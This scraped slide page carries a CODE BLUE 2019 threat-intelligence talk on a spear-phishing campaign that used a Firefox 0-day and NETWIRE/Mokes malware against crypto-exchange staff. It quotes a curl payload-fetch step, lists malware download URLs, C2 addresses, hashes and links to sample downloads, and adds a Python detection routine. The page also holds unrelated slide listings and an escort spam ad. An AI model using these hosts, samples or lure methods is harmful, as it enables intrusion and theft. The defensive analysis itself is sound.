[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 

Dernier

Chizaram's Women Tech Makers Deck. .pptx
Chizaram's Women Tech Makers Deck.  .pptxChizaram's Women Tech Makers Deck.  .pptx
Chizaram's Women Tech Makers Deck. .pptxogubuikealex
 
miladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptxmiladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptxCarrieButtitta
 
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.KathleenAnnCordero2
 
Simulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with AerialistSimulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with AerialistSebastiano Panichella
 
The Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism PresentationThe Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism PresentationNathan Young
 
Genshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptxGenshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptxJohnree4
 
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.comSaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.comsaastr
 
Engaging Eid Ul Fitr Presentation for Kindergartners.pptx
Engaging Eid Ul Fitr Presentation for Kindergartners.pptxEngaging Eid Ul Fitr Presentation for Kindergartners.pptx
Engaging Eid Ul Fitr Presentation for Kindergartners.pptxAsifArshad8
 
Quality by design.. ppt for RA (1ST SEM
Quality by design.. ppt for  RA (1ST SEMQuality by design.. ppt for  RA (1ST SEM
Quality by design.. ppt for RA (1ST SEMCharmi13
 
SBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation TrackSBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation TrackSebastiano Panichella
 
Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸mathanramanathan2005
 
Dutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular PlasticsDutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular PlasticsDutch Power
 
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATIONRACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATIONRachelAnnTenibroAmaz
 
Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170Escort Service
 
The 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software EngineeringThe 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software EngineeringSebastiano Panichella
 
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...Henrik Hanke
 
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory  affair 1st sem CRRINDIAN GCP GUIDELINE. for Regulatory  affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRRsarwankumar4524
 
PHYSICS PROJECT BY MSC - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC  - NANOTECHNOLOGYPHYSICS PROJECT BY MSC  - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC - NANOTECHNOLOGYpruthirajnayak525
 
Work Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptxWork Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptxmavinoikein
 
Early Modern Spain. All about this period
Early Modern Spain. All about this periodEarly Modern Spain. All about this period
Early Modern Spain. All about this periodSaraIsabelJimenez
 

Dernier (20)

Chizaram's Women Tech Makers Deck. .pptx
Chizaram's Women Tech Makers Deck.  .pptxChizaram's Women Tech Makers Deck.  .pptx
Chizaram's Women Tech Makers Deck. .pptx
 
miladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptxmiladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptx
 
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.
 
Simulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with AerialistSimulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with Aerialist
 
The Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism PresentationThe Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism Presentation
 
Genshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptxGenshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptx
 
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.comSaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
 
Engaging Eid Ul Fitr Presentation for Kindergartners.pptx
Engaging Eid Ul Fitr Presentation for Kindergartners.pptxEngaging Eid Ul Fitr Presentation for Kindergartners.pptx
Engaging Eid Ul Fitr Presentation for Kindergartners.pptx
 
Quality by design.. ppt for RA (1ST SEM
Quality by design.. ppt for  RA (1ST SEMQuality by design.. ppt for  RA (1ST SEM
Quality by design.. ppt for RA (1ST SEM
 
SBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation TrackSBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation Track
 
Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸
 
Dutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular PlasticsDutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
 
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATIONRACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
 
Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170
 
The 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software EngineeringThe 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software Engineering
 
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
 
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory  affair 1st sem CRRINDIAN GCP GUIDELINE. for Regulatory  affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRR
 
PHYSICS PROJECT BY MSC - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC  - NANOTECHNOLOGYPHYSICS PROJECT BY MSC  - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC - NANOTECHNOLOGY
 
Work Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptxWork Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptx
 
Early Modern Spain. All about this period
Early Modern Spain. All about this periodEarly Modern Spain. All about this period
Early Modern Spain. All about this period
 

[CB19] Recent APT attack on crypto exchange employees by Heungsoo Kang

• 1. CODE BLUE 2019 @TOKYO. Heungsoo Kang, LINE
DISCRETION IN APT: Recent attack on crypto exchange services
• 2. $ whoami
- Heungsoo Kang (David)
- LINE
- Mobile messenger loved in Asia
- Lots of services
- Also crypto/fiat exchange BITBOX / BITMAX
- We care about security very much!
- Contact
- cmpdebugger@gmail.com / @jz__
• 3. About this talk
- Background
- Coinbase announced it had been hit by a very sophisticated, highly targeted attack
- Coinbase blog / Philip Martin (@SecurityGuyPhil)
- Decent analysis by objective-see.com
- Undisclosed, but LINE was also targeted
• 5. About this talk
- Goal of this talk
- To share the perspectives of …
- The victim (how it looked to him)
- The attackers (what they had prepared)
- The blue team (what we could and could not see)
- To share information about …
- Its malware
- Attackers
• 7. Perspective 1: Victim
How it looked on the surface
• 8. About Victim
- A talented developer
- ~10 years of experience
- Device
- iPhone
- MacBook Pro
• 9-14. Email Conversation
- Victim receives an email through his personal account
- sender
- nm603@cam.ac.uk
- Legit from cam.ac.uk (passed SPF/DKIM/DMARC)
- Link uses legit cam.ac.uk
- Adams Prize is "Looking for field experts"
- LinkedIn profile
• 15. Email Conversation
- LinkedIn Profile
- 100+ connections
- Nice fit to the story
• 16. Email Conversation
- Victim carries on the conversation with the attacker without any suspicion
• 17-18. Email Conversation
- Victim gets the exploit link, ID, temporary PW
• 19-21. Web Browsing
- Victim visits the URL … to see a warning
- "Firefox only" (the warning links to the official Firefox page)
• 22. Web Browsing
- With Firefox, the web page shows up
• 23-24. Exploit
- Firefox downloaded the exploit JavaScript
- Shellcode uses curl http://x.x.x.x/malw so it doesn't trigger macOS Gatekeeper (curl does not set the com.apple.quarantine attribute that Gatekeeper keys on, so the dropped file is never evaluated)
- The attack was stopped here
- Detected, suspended & killed
- Red flag based on various indicators + in-house tools
• 25-27. Response
- Victim gets interrogated … just kidding
- Victim gets interviewed and helps the security team get the picture
- Security team follows up, prepares additional tracking
- Stage 1 sends system information, downloads stage 2 malware
- Stage 1: macos.netwire variant
- Stage 2: macos.mokes variant
• 28. Perspective 2: Attackers
What lies beneath
• 29. Prepare Weapons
- Prepare weaponized exploits
- Firefox code execution (CVE-2019-11707)
- Firefox sandbox escape (CVE-2019-11708)
• 30-31. Prepare Weapons
- Prepare malware
- Stage 1
- Report victim information
- Scout: small, new, low detection
- Stage 2
- Full Remote Administration Tool (RAT)
• 32. Prepare Infra
- Prepare servers
- C2
- Stage 1: 89.34.111.113 (qhoster.com, Uruguay)
- Stage 2: 185.49.69.210 (leaseweb.com, UK)
- Stage 2: 142.93.110.250 (digitalocean.com, US)
- Host malware: 185.162.131.96 (king-servers.com, Russia)
• 33. Prepare Infra
- Prepare servers
- Host exploit: 54.38.93.182 (ovh.com, France)
- Buy domain analyticsfit.com
- Payment for the servers
- Credit card, PayPal, BTC, Zcash, Monero, etc.
• 34. Hack Accounts
- Hack accounts for the attack
- At least 2 accounts from cam.ac.uk hacked
- nm603@, grh37@, ...
• 35. Hack Accounts
- How the accounts were hacked is undisclosed
- Phishing of individuals?
- Credential stuffing (using leaked ID/passwords)?
- Brute force?
- DB compromise?
• 36-37. Hack Accounts
- The University has a bold service, useful for OSINT: anyone can list accounts
- http://jackdaw.cam.ac.uk/mailsearch/
- Email account search service
- Useful for everyone (students, and…)
• 38-39. University Accounts
- Services for the account owners:
- Email address: nm603@cam.ac.uk
- Personal web hosting: hxxp://people.ds.cam.ac.uk/nm603
- Makes it all look authentic
• 40-41. Prepare Website
- Prepare web pages on people.ds.cam.ac.uk
- Fake University site
- Add simple JavaScript for social engineering
- "Please use Firefox …"
- Load exploit
  • 42. Script on Fake Website - if (macOS && not Firefox) then show “use Firefox” message
  • 45. Script on Fake Website - if (macOS && Firefox) or (not macOS) then load /script.js - So people.ds.cam.ac.uk/script.js must be the exploit!
  • 46. Script on Fake Website - So people.ds.cam.ac.uk/script.js must be the exploit! → No. (Actual packet capture of the victim at the time of attack)
  • 49. Script on Fake Website - The actual exploit code was loaded at the end of the HTML - Made to look like Google’s analytics.js - Every website has one at the end - HTTPS
  • 50. Prepare John Doe - The accounts they hacked are [nm603, grh37] - Make up names accordingly: Neil Morris, Gregory Harris - Join LinkedIn, make the profile fit the storyline (university staff) - Add connections, 100+ - How we all love to accept random requests - Write a nice email signature - Add links to website, LinkedIn
  • 53. Start Operation - Set targets - Look for cryptocurrency exchange employees - Start by opening a conversation through email - Evaluate targets through conversation - Select targets related to cryptocurrency exchanges - Guide ONLY selected targets to the exploit page
  • 55. Operation: Evaluate Targets - Evaluate targets through conversation (cont’d) - Another case - https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear-phished/ - Review of how he “almost” got hacked by this campaign - Author communicated via email with grh37@cam.ac.uk - He was not guided to the final exploit page - Initially selected as a target, but evaluated out.
  • 60. Operation: Goal - Initial exploit → run stage 1 malware - Stage 1 malware reports information about the victim - Stage 1 malware downloads stage 2 malware (full RAT) - Go for profit!! $$
  • 61. Perspective 3: Blue Team - What can we see? Challenges?
  • 62. Blue Team Downsides - Cliché, yes - Too many things to watch - Employees from many countries - Huge infrastructure - Countless servers (we have our own AWS: “Verda”)
  • 63. Blue Team Weapons - From infrastructure - Network-based defense/detection methods - Network visibility solutions to see HTTPS connections - From endpoint - Endpoint Detection & Response / Antivirus - Patch management system - Various monitoring solutions, etc.
  • 65. Blue Team Weapons - Honeypots, sandboxes - Indicators of Compromise service - Network segregation / air-gapping - Authentication, 2FA - Desktop virtualization - More & more… → Usable security: should avoid oppressing productivity
  • 68. Pain Points for Blue Team - Attackers sent email to the victim’s personal Gmail account - Legit cam.ac.uk email + website - HTTPS + encrypted communication - Low detection (Stage 1 = 1, Stage 2 = 0 detections on VirusTotal) - Encrypted, non-HTTPS protocol for C2 connection on port 443 - Diverse use of servers (exploit, malware download, C2, etc.) - Stage 2 downloaded outside the corp network to avoid detection
  • 71. Breadcrumbs for Blue Team - Shellcode - curl - Mach-O (executable) download - Communication to suspicious IP addresses (C2) - Unknown new executable files - Security team had resources to analyze & follow up - Plus other undisclosable indicators & methods
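Added example, not code from the talk: a small triage routine that runs the pain points and breadcrumbs above (curl launched from a browser, a Mach-O fetched from a bare-IP host, traffic to a known C2, encrypted-but-not-TLS traffic on 443) over constructed telemetry. The event format, field names and the benign sample values are assumptions of this example; the addresses are the ones the slides report for this campaign.

```python
import ipaddress
from urllib.parse import urlparse

# Addresses the slides report: Stage 1 C2, Stage 2 C2s, malware download host.
KNOWN_C2 = {"89.34.111.113", "185.49.69.210", "142.93.110.250", "185.162.131.96"}
BROWSERS = {"firefox", "Google Chrome", "Safari"}
MACHO_MAGICS = {b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",  # 32-bit, both byte orders
                b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",  # 64-bit
                b"\xca\xfe\xba\xbe"}                       # fat/universal
R_CURL, R_MACHO = "curl spawned by a browser", "Mach-O fetched from a bare-IP URL"
R_C2, R_NOTLS = "connection to a known C2 address", "non-TLS traffic on port 443"

def is_macho(head: bytes) -> bool:
    return head[:4] in MACHO_MAGICS

def bare_ip_url(url: str) -> bool:
    """True if the URL host is a literal IP; hxxp:// defanging parses the same."""
    try:
        ipaddress.ip_address(urlparse(url).hostname or "")
        return True
    except ValueError:
        return False

def triage(events):
    """Return (rule, event) pairs. Event dicts are this example's own format:
    process {image, parent}, download {url, head}, connect {dst, dport, first_bytes}."""
    hits = []
    for e in events:
        if e["type"] == "process" and e["image"] == "curl" and e["parent"] in BROWSERS:
            hits.append((R_CURL, e))
        elif e["type"] == "download" and is_macho(e["head"]) and bare_ip_url(e["url"]):
            hits.append((R_MACHO, e))
        elif e["type"] == "connect":
            if e["dst"] in KNOWN_C2:
                hits.append((R_C2, e))
            # A TLS record starts with content type 0x16 (handshake) and major
            # version 0x03; anything else on 443 is encrypted-but-not-HTTPS.
            if e["dport"] == 443 and not e["first_bytes"].startswith(b"\x16\x03"):
                hits.append((R_NOTLS, e))
    return hits

# Constructed sample events mirroring the chain the talk describes.
SAMPLE_EVENTS = [
    {"type": "process", "image": "curl", "parent": "Terminal"},       # a developer
    {"type": "process", "image": "curl", "parent": "firefox"},        # shellcode
    {"type": "download", "url": "hxxp://185.162.131.96/i/IconServicesAgent",
     "head": b"\xcf\xfa\xed\xfe" + b"\x00" * 28},                     # 64-bit Mach-O
    {"type": "connect", "dst": "203.0.113.10", "dport": 443, "first_bytes": b"\x16\x03\x01"},
    {"type": "connect", "dst": "89.34.111.113", "dport": 443, "first_bytes": b"\x8c\x41\x00"},
]

def triggered_rules(events=SAMPLE_EVENTS):
    return [rule for rule, _ in triage(events)]
```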
  • 74. Malware Information - Stage 1 & 2
  • 75. Stage 1 - Overview - NETWIRE - Commercial administration tool - Agent builder
  • 77. Stage 1 - Overview - Hash - MD5 - de3a8b1e149312dac5b8584a33c3f3c6 - SHA256 - 07a4e04ee8b4c8dc0f7507f56dc24db00537d4637afee43dbb9357d4d54f6ff4 - Downloaded from - hxxp://185.162.131.96/i/IconServicesAgent
  • 78. Stage 1 - Overview - C2 server - 89.34.111.113 - Port closed - Binary is not signed
  • 79. Stage 1 - NETWIRE - C2 protocol - https://github.com/pan-unit42/public_tools/blob/master/netwire/commands.json - Commands XORed with 0xe3 - C2 command handler function at 0x4109
  • 80. Stage 1 - NETWIRE - Reports user/host information - Reports the user’s external IP
  • 81. Stage 1 - NETWIRE - Lists processes - Starts a shell
  • 82. Stage 1 - NETWIRE - Search / write / execute file - Heartbeat (I’m alive)
  • 83. Stage 1 - NETWIRE
  • 84. Stage 1 - NETWIRE - Persistence - “Don’t want to die” - Adds itself to the signal handler
  • 87. Stage 1 - NETWIRE - Downloads stage 2 - Shell executed after downloading … left a shell history file
  • 88. Stage 1 - String “hyd7u5jdi8” - Unique string found → RC4 key - This NETWIRE binary contains 4 RC4 keys in total - Key string “hyd7u5jdi8” is used only once, for decrypting “%Rand%”
  • 89. Stage 1 - Variants - hxxp://185.162.131.96 (download server) is still up (Apache) - Brute-forced the server: found some variants in the directory:
  hxxp://185.162.131.96/i/195/195
  hxxp://185.162.131.96/i/kr
  hxxp://185.162.131.96/i/kri
  hxxp://185.162.131.96/i/pm
  hxxp://185.162.131.96/i/pmi
  hxxp://185.162.131.96/i/thk
  - Same code, different data by different RC4 key - But has the same key “hyd7u5jdi8”
  • 91. Stage 1 - Variants (URL - MD5):
  hxxp://185.162.131.96/i/IconServicesAgent - de3a8b1e149312dac5b8584a33c3f3c6
  hxxp://185.162.131.96/i/195/195 - b6f92b20816f23c147445bd5eec86a06
  hxxp://185.162.131.96/i/kr - 8b2b7537c792ecf24d8ee7b9fbb942f8
  hxxp://185.162.131.96/i/kri - 5030422b3428c0f938e3ad03720ca9e8
  hxxp://185.162.131.96/i/pm - 70286abc22eca9a9cbea24e551c891cd
  hxxp://185.162.131.96/i/pmi - de3a8b1e149312dac5b8584a33c3f3c6
  hxxp://185.162.131.96/i/thk - fc99b1407655674573ee4167f1e3dcbd
  • 92. Stage 1 - Variants - Uploaded to VT - https://tinyurl.com/brutedown - Downloadable here - https://tinyurl.com/brutedown2
  • 93. Stage 2 - Overview - Hash - MD5 - af10aad603fe227ca27077b83b26543b - SHA256 - 97200b2b005e60a1c6077eea56fc4bb3e08196f14ed692b9422c96686fbfc3ad - Downloaded by stage 1
  • 94. Stage 2 - Overview - macos.Mokes - Remote administration tool - C2 server - 185.49.69.210 port 443|80 (closed) - athlon4free2updates1.com / 142.93.110.250 - Alive but not sending a payload
  • 95. Stage 2 - Certificate invalid
  • 96. Stage 2 - Overview - Built with Qt - Huge binary size (13 MB) - FLIRT signatures for Qt versions, OpenSSL - Only 20% identified - Also not signed
  • 97. Stage 2 - Copies itself under one of these names, chosen at random
  • 98. Stage 2 - Persistence
  • 99. Stage 2 - Hides the application from the macOS Dock - Searches for files - AutoFileSearchTask::files_to_search
  • 100. More About the Campaign - Connecting the dots on their “work habits”
  • 101. Previous Analysis - Named - Only recently referred to as “HydSeven”, after the Coincheck attack - From the RC4 key string “hyd7u5jdi8” - History - Known for attacking banks, undisclosed financial businesses - Introduced in FireEye Trend (2017) - https://tinyurl.com/firetrend - Nice overview by mertsarica.com (2017) - https://tinyurl.com/1mertsa - https://tinyurl.com/2mertsa
  • 102. Previous Analysis - Attack analysis by Exatel (2016) - https://tinyurl.com/1exatel - Analysis of the Coincheck hack by LAC Watch (2019) - https://tinyurl.com/lac-coincheck
  • 103. Initial Compromise - Based on spear phishing - Office document with macro - Office 1-day exploit (EPS) - WinRAR 1-day exploit (ACE path) - 0-day exploit (Firefox)
  • 104. Favorite Method - Hacked London School of Economics account - Used the account for email communication - “We need an expert like you as jury for the ‘Banker Awards’” - Abuse the university’s web hosting for phishing [https://tinyurl.com/1mertsa]
  • 107. Favorite Method - Not afraid of making conference calls with victims [https://tinyurl.com/2mertsa]
  • 108. Favorite Method - Abuse LinkedIn accounts - Impersonate someone with the same/similar name [https://tinyurl.com/1mertsa]
  • 109. Favorite Method - Hacked Angelina College [https://tinyurl.com/firetrend]
  • 110. Favorite VPS - This attack: OVH, LeaseWeb, King-Servers, QHoster - Previous campaigns - OVH x 6 - LeaseWeb x 6 - King-Servers x 1 - QHoster x 1 - Etc. (Vultr, netsec.com, HostSailor, etc.)
  • 111. But… - Why him? - Attack on 1 employee - For the exchange? The individual?
  • 112. Conclusion - Attackers - Decent social engineering - Use of compromised university accounts (email/site) - Responsive communication - Use of 0-day/n-day exploits - or just Office + macro - Malware - NETWIRE/MOKES - Platform-independent source code (Windows, macOS, Linux) - Maintain low AV detection - Use digital certificates for Windows binaries - Active - Skilled operators
  • 113. Conclusion - Countermeasures - Minimize the risk while maintaining usable security - User education: awareness of spear-phishing - Defense in depth: block SOMEWHERE in the middle, block SOMETIME in the middle - Detections & sensors: EPP (AV), network monitoring, honeypots, IoC, human resources
  • 114. Questions? - Contact - cmpdebugger@gmail.com - @jz__ - id: heungsookang